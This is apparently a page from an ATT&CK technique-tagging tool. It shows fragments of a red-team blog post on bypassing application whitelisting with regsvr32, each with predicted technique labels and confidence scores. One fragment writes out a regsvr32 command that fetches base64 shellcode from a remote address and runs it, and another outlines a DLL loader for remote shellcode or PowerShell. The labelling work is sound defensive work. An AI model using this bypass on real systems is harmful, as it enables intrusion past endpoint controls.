“how to evade application whitelisting using regsvr32 how to evade application whitelisting using regsvr32 joff thyer / / i was recently working on a red team for a customer that was very much up to date with their defenses. this customer had tight egress controls, perimeter proxy…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218.010Regsvr32
92%
“” dll registration method is that whatever dll you create only has to export four different methods in order to work. these are : - entrypoint ( ) - dllregisterserver ( ) - dllunregisterserver ( ) - dllinstall ( ) as casey points out in various blog entries, this affords you with…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
72%
“from the fancy dll directly. c : \ > regsvr32. exe / s / i : shellcode, http : / / 10. 10. 10. 10 / calc. b64 rs64. dll now we can do the same thing, only this time using powershell instead. generate your favorite powershell base64 encoded payload. let me guess, you probably want…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1574.001DLL
70%
“##loit case, the dll entry point is named “ control _ rundll ”. while this might evade whitelisting, we also knew this old trick had been played before and we likely could not count on it again. one interesting technique published by casey smith involves the dll registration proc…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
57%
“pass in a comma followed by either a filename or url pointing to data that is base64 encoded. the base64 encoded data is either binary shellcode or a powershell script. - read the file or url contents, then base64 decode. - if the content is powershell, create a runspace pipeline…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218.010Regsvr32
51%
“##loit case, the dll entry point is named “ control _ rundll ”. while this might evade whitelisting, we also knew this old trick had been played before and we likely could not count on it again. one interesting technique published by casey smith involves the dll registration proc…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Joff Thyer // I was recently working on a Red Team for a customer that was very much up to date with their defenses. This customer had tight egress controls, […]
